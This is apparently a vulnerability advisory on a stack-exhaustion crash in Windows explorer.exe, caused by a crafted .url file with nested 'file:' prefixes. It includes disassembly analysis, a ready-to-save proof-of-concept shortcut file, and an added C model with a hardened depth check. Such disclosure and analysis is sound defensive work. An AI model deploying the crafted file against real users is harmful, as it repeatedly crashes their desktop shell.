Parsing URL formatting vulnerability
1. description
The Windows shell program explorer.exe mishandles ".url" files that contain malformed data; a local attacker can use this to crash the explorer.exe process on the user's machine.
When explorer.exe parses a *.url file whose URL is in a specially crafted format, it crashes. It crashes again even when the user tries to delete the file from Explorer.
At the time of writing the vendor has not released a patch or upgrade, so the vulnerability is still unfixed.
Code at the faulting address (the stack-probe loop of __chkstk):
7D5CE6B9 push ecx
7D5CE6BA lea ecx, dword ptr [esp+8]
7D5CE6BE sub ecx, 1000h
7D5CE6C4 sub eax, 1000h
7D5CE6C9 test dword ptr [ecx], eax ; exception address
7D5CE6CB cmp eax, 1000h
7D5CE6D0 jnb short 7D5CE6BE
7D5CE6D2 sub ecx, eax
7D5CE6D4 mov eax, esp
7D5CE6D6 test dword ptr [ecx], eax
7D5CE6D8 mov esp, ecx
7D5CE6DA mov ecx, dword ptr [eax]
7D5CE6DC mov eax, dword ptr [eax+4]
7D5CE6DF push eax
7D5CE6E0 retn
2. detailed analysis
In the IDA disassembly we can see:
.text:7D6A112C ; public: virtual long __stdcall CFileUrlStub::ParseDisplayName(struct HWND__ *, struct IBindCtx *, unsigned short *, unsigned long *, struct _ITEMIDLIST **, unsigned long *)
.text:7D6A112C CFileUrlStub::ParseDisplayName proc near
.text:7D6A112C                                 ; DATA XREF: .text:7D5A327C o
.text:7D6A112C
.text:7D6A112C var_20A0 = dword ptr -20A0h
.text:7D6A112C var_209C = dword ptr -209Ch
.text:7D6A112C var_2098 = dword ptr -2098h
.text:7D6A112C Srch     = word ptr -2094h
.text:7D6A112C var_104C = dword ptr -104Ch
.text:7D6A112C var_4    = dword ptr -4
.text:7D6A112C arg_C    = dword ptr  14h
.text:7D6A112C arg_14   = dword ptr  1Ch
.text:7D6A112C arg_18   = dword ptr  20h
.text:7D6A112C
.text:7D6A112C mov     edi, edi
.text:7D6A112E push    ebp
.text:7D6A112F mov     ebp, esp
.text:7D6A1131 mov     eax, 20A0h      ; size of the local stack frame
.text:7D6A1136 call    __chkstk        ; the routine in which the fault occurs
.text:7D6A1136
.text:7D6A113B mov     eax, ___security_cookie
.text:7D6A1140 push    ebx
.text:7D6A1141 mov     ebx, [ebp+arg_18]
.text:7D6A1144 push    esi
.text:7D6A1145 mov     esi, [ebp+arg_14]
.text:7D6A1148 push    edi
.text:7D6A1149 mov     edi, [ebp+arg_C]
.text:7D6A114C push    edi
.text:7D6A114D mov     [ebp+var_4], eax
.text:7D6A1150 call    ds:UrlGetLocationW(x)
.text:7D6A1156 push    0
.text:7D6A1158 mov     [ebp+var_2098], eax
.text:7D6A115E push    6
.text:7D6A1160 lea     eax, [ebp+var_209C]
.text:7D6A1166 push    eax
.text:7D6A1167 lea     eax, [ebp+var_104C+2]
.text:7D6A116D push    eax
.text:7D6A116E push    edi
.text:7D6A116F mov     [ebp+var_20A0], 824h
.text:7D6A1179 mov     [ebp+var_209C], 823h
.text:7D6A1183 call    ds:UrlGetPartW(x,x,x,x,x)
.text:7D6A1189 test    eax, eax
.text:7D6A118B jl      short loc_7D6A11A1
.text:7D6A118B
.text:7D6A118D cmp     [ebp+var_209C], 0
.text:7D6A1194 jz      short loc_7D6A11A1
.text:7D6A1194
.text:7D6A1196 mov     word ptr [ebp+var_104C], 3Fh
.text:7D6A119F jmp     short loc_7D6A11A9
.text:7D6A119F
.text:7D6A11A1 ; ---------------------------------------------------------------------------
.text:7D6A11A1
.text:7D6A11A1 loc_7D6A11A1:                   ; CODE XREF: CFileUrlStub::ParseDisplayName(HWND__ *,IBindCtx *,ushort *,ulong *,_ITEMIDLIST * *,ulong *)+5F j
.text:7D6A11A1                                 ; CFileUrlStub::ParseDisplayName(HWND__ *,IBindCtx *,ushort *,ulong *,_ITEMIDLIST * *,ulong *)+68 j
.text:7D6A11A1 and     word ptr [ebp+var_104C], 0
.text:7D6A11A1
.text:7D6A11A9
.text:7D6A11A9 loc_7D6A11A9:                   ; CODE XREF: CFileUrlStub::ParseDisplayName(HWND__ *,IBindCtx *,ushort *,ulong *,_ITEMIDLIST * *,ulong *)+73 j
.text:7D6A11A9 push    0
.text:7D6A11AB lea     eax, [ebp+var_20A0]
.text:7D6A11B1 push    eax
.text:7D6A11B2 lea     eax, [ebp+Srch]
.text:7D6A11B8 push    eax
.text:7D6A11B9 push    edi
.text:7D6A11BA call    ds:PathCreateFromUrlW(x,x,x,x) ; this function recurses
.text:7D6A11C0 test    eax, eax
.text:7D6A11C2 jl      short loc_7D6A121B
.text:7D6A11C2
.text:7D6A11C4 push    ebx             ; int
.text:7D6A11C5 push    esi             ; int
.text:7D6A11C6 xor     edi, edi
.text:7D6A11C8 push    edi             ; char
.text:7D6A11C9 push    edi             ; int
.text:7D6A11CA lea     eax, [ebp+Srch]
.text:7D6A11D0 push    eax             ; lpSrch
.text:7D6A11D1 call    ILCreateFromPathEx(x,x,x,x,x)
Because the parameters are not checked strictly, this function keeps calling itself recursively, and every call consumes 0x20A0 bytes of stack. A Windows thread's stack does not grow without limit; once it exceeds its maximum size an exception is raised. After the 28th call the stack reaches the maximum Windows allows, and Explorer exits abnormally.
3. exploit code
[InternetShortcut]
file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:
Save the text above as a file with the .url extension; it crashes the desktop shell program (explorer.exe).
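The C model below is an added example, not code from the original advisory or from shell32: it reproduces the analysis in miniature, reserving the same 0x20A0 bytes per recursion level that ParseDisplayName's frame does, and shows the check a hardened parser would apply before recursing. MAX_FILE_URL_DEPTH, the kNested25 sample (25 nested "file:" prefixes, like the proof of concept above) and the function names are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>
/* Added model, not shell32 code: each recursion level reserves the same
 * 0x20A0 bytes ParseDisplayName's frame does, so stack use grows linearly
 * with the number of nested "file:" prefixes in the URL. */
#define FRAME_BYTES 0x20A0
#define MAX_FILE_URL_DEPTH 4              /* assumed cap, not a Windows value */

/* Constructed sample: 25 nested "file:" prefixes, like the proof of concept. */
#define F5 "file:file:file:file:file:"
static const char kNested25[] = F5 F5 F5 F5 F5;
static char g_path[64];                   /* output buffer shared by main/tests */
static int g_calls;                       /* how many recursive frames ran */

/* Number of "file:" prefixes nested at the start of url. */
size_t file_scheme_depth(const char *url) {
    size_t depth = 0;
    while (strncmp(url, "file:", 5) == 0) { url += 5; depth++; }
    return depth;
}
/* Stack the recursive path consumes for a given nesting depth. */
size_t stack_bytes_for_depth(size_t depth) { return depth * FRAME_BYTES; }

/* Model of the faulty behaviour: strip one "file:" and recurse, burning
 * FRAME_BYTES of stack per level with no bound on the depth. */
static int to_path_unbounded(const char *url, char *out, size_t cb, int *calls) {
    volatile char frame[FRAME_BYTES];     /* stand-in for the 0x20A0 local frame */
    frame[0] = 0;
    ++*calls;
    if (strncmp(url, "file:", 5) == 0)
        return to_path_unbounded(url + 5, out, cb, calls);
    snprintf(out, cb, "%s", url);
    return 0;
}

/* Hardened form: same conversion, but the nesting depth is checked before the
 * first recursive call. Returns 0 on success, -1 if the URL is rejected. */
int to_path_bounded(const char *url, char *out, size_t cb, int *calls) {
    *calls = 0;
    if (file_scheme_depth(url) > MAX_FILE_URL_DEPTH) return -1;
    return to_path_unbounded(url, out, cb, calls);
}

int main(void) {
    int rc = to_path_bounded(kNested25, g_path, sizeof g_path, &g_calls);
    printf("depth %zu, %zu stack bytes, rc=%d\n", file_scheme_depth(kNested25),
           stack_bytes_for_depth(file_scheme_depth(kNested25)), rc);
    return 0;
}
```

With the page's figures, 28 levels cost 28 * 0x20A0 = 233856 bytes, which is what stack_bytes_for_depth(28) returns.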